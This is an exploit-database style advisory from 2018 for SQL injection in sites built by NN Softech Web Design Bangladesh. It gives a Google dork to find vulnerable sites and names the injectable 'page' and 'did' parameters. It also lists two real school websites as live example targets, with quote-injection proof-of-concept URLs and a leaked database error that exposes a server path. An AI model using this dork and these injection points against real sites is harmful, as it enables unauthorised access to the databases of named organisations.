#################################################################################################
# Exploit Title : Powered by NN Softech Web Design Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Owner of the Script : bd.linkedin.com/in/sheikh-shaheen-30b40011a
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered by : NN SOFTECH''
# Exploit :
/index.php?page=[SQL Injection]
/news_events.php?page=1&did=SQL Injection]
#################################################################################################
# Example Site => cbsfmhs.edu.bd/news_events.php?page=1&did=52%27 => [ Proof of Concept ] => archive.is/eCGLQ
mgsc.edu.bd/index.php?page=43%27 => [ Proof of Concept ] => archive.is/61kCD
# SQL Database Error =>
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/cbsm3x2s/public_html/news_events.php on line 131
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################